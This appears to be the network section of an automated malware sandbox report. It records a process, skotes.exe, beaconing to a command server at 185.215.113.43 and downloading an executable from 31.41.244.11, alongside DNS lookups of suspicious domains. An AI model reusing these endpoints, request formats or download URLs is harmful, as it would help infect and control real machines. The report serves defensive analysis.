Dec 18, 2024 13:38:50.147062063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.147186041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.147217989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.147269964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.148396015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.148435116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.148503065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.149409056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.149512053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.149550915 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.149694920 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.150640011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.150739908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.150811911 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.151796103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.151850939 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.151933908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.152072906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.152926922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.153038979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.153105974 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.153163910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.154078007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.154212952 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.154412985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.154763937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.155421019 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.155502081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.155704975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.155843019 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.156466961 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.156625986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.156655073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.156961918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.157689095 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.157807112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.157824039 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.158159018 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.159267902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.159338951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.159552097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.159672976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.160432100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.160482883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.160594940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.160739899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.161693096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.161758900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.161844015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.161936998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.162827015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.162966013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.162992954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.163045883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.163798094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.163877964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.163917065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.164180040 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.164688110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.164859056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.164962053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.165215015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.166016102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.166182995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.166253090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.166378021 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.166960955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.167032957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.167201996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.167273998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.168245077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.168348074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.168368101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.168482065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.169338942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.169470072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.169553041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.169651985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.170425892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.170488119 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.170608044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.170730114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.171663046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.171745062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.302479029 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.302613974 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.302788973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.302788973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.302977085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.303190947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.303242922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.303307056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.304183960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.304275036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.304351091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.304424047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.305340052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.305403948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.305504084 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.305573940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.307027102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.307087898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.307390928 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.307456970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.307677031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.307817936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.307975054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.308039904 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.308938026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.309014082 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.309102058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.309186935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.310121059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.310184956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.310250044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.310534000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.311250925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.311346054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.311379910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.311472893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.312344074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.312406063 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.312539101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.312593937 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.313514948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.313597918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.313756943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.313859940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.314788103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.314899921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.314914942 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.314980030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.315865993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.315922976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.316028118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.316087008 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.317084074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.317179918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.317202091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.317255020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.318217993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.318272114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.318470001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.318521023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.319339037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.319427013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.319534063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.319618940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.321115971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.321129084 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.321197987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.321729898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.321782112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.322093010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.322154999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.323028088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.323129892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.323159933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.323216915 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.324078083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.324217081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.324261904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.324417114 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.325222969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.325279951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.325381041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.325442076 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.326390982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.326463938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.326576948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.326643944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.327619076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.327666044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.327748060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.327815056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.328758001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.328877926 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.328910112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.328969955 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.329912901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.329978943 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.330054045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.330101967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.331224918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.331284046 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.331290007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.331343889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.332302094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.332408905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.332452059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.332549095 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.333506107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.333571911 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.333592892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.333655119 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.334705114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.334796906 CET	49723	80	192.168.2.8	31.41.244.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 13:38:25.669009924 CET	192.168.2.8	1.1.1.1	0x8af4	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:25.892318964 CET	192.168.2.8	1.1.1.1	0xf4d4	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:31.708304882 CET	192.168.2.8	1.1.1.1	0x1aec	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:42.459774971 CET	192.168.2.8	1.1.1.1	0xfc16	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:42.459981918 CET	192.168.2.8	1.1.1.1	0xad69	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 18, 2024 13:38:46.575634003 CET	192.168.2.8	1.1.1.1	0x7801	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:46.575690985 CET	192.168.2.8	1.1.1.1	0x6e8f	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:38:50.742300034 CET	192.168.2.8	1.1.1.1	0x5aa6	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:50.742367983 CET	192.168.2.8	1.1.1.1	0xfd34	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:39:15.099386930 CET	192.168.2.8	1.1.1.1	0x62b5	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:15.099494934 CET	192.168.2.8	1.1.1.1	0x7dce	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:39:18.467713118 CET	192.168.2.8	1.1.1.1	0x77d0	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:18.467782974 CET	192.168.2.8	1.1.1.1	0xb1a7	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:39:23.917562008 CET	192.168.2.8	1.1.1.1	0x6fdb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:23.917710066 CET	192.168.2.8	1.1.1.1	0x5549	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 18, 2024 13:39:26.886876106 CET	192.168.2.8	1.1.1.1	0xc0c6	Standard query (0)	twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:26.886992931 CET	192.168.2.8	1.1.1.1	0x9311	Standard query (0)	twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:39:29.742615938 CET	192.168.2.8	1.1.1.1	0x7e19	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:29.743230104 CET	192.168.2.8	1.1.1.1	0xef19	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 18, 2024 13:42:53.800179005 CET	192.168.2.8	1.1.1.1	0x5b54	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 13:38:25.888216019 CET	1.1.1.1	192.168.2.8	0x8af4	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:26.292831898 CET	1.1.1.1	192.168.2.8	0xf4d4	No error (0)	grannyejh.lat		104.21.64.80	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:26.292831898 CET	1.1.1.1	192.168.2.8	0xf4d4	No error (0)	grannyejh.lat		172.67.179.109	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:32.035486937 CET	1.1.1.1	192.168.2.8	0x1aec	No error (0)	pancakedipyps.click		104.21.23.76	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:32.035486937 CET	1.1.1.1	192.168.2.8	0x1aec	No error (0)	pancakedipyps.click		172.67.209.202	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:42.701917887 CET	1.1.1.1	192.168.2.8	0xfc16	No error (0)	httpbin.org		98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:42.701917887 CET	1.1.1.1	192.168.2.8	0xfc16	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:47.195127964 CET	1.1.1.1	192.168.2.8	0x7801	No error (0)	home.twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:38:50.879940033 CET	1.1.1.1	192.168.2.8	0x5aa6	No error (0)	home.twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:15.403888941 CET	1.1.1.1	192.168.2.8	0x62b5	No error (0)	twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:18.606584072 CET	1.1.1.1	192.168.2.8	0x77d0	No error (0)	twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:24.054900885 CET	1.1.1.1	192.168.2.8	0x6fdb	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:24.057049990 CET	1.1.1.1	192.168.2.8	0x5549	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 18, 2024 13:39:27.024523973 CET	1.1.1.1	192.168.2.8	0xc0c6	No error (0)	twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:39:29.880769014 CET	1.1.1.1	192.168.2.8	0x7e19	No error (0)	home.twentytk20pn.top		185.185.71.170	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:42:53.938184977 CET	1.1.1.1	192.168.2.8	0x5b54	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:05.319262028 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:38:06.643249989 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:08.271142960 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:38:09.620628119 CET	696	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 39 0d 0a 20 3c 63 3e 31 30 31 36 38 39 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 38 39 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 36 34 65 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 39 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 39 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 [TRUNCATED] Data Ascii: 1f9 <c>1016894001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1016895001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#1016896001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1016897001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1016898001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:09.837518930 CET	62	OUT	GET /files/unique3/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 18, 2024 13:38:11.076076031 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:10 GMT Content-Type: application/octet-stream Content-Length: 1943040 Last-Modified: Wed, 18 Dec 2024 12:17:47 GMT Connection: keep-alive ETag: "6762bd6b-1da600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 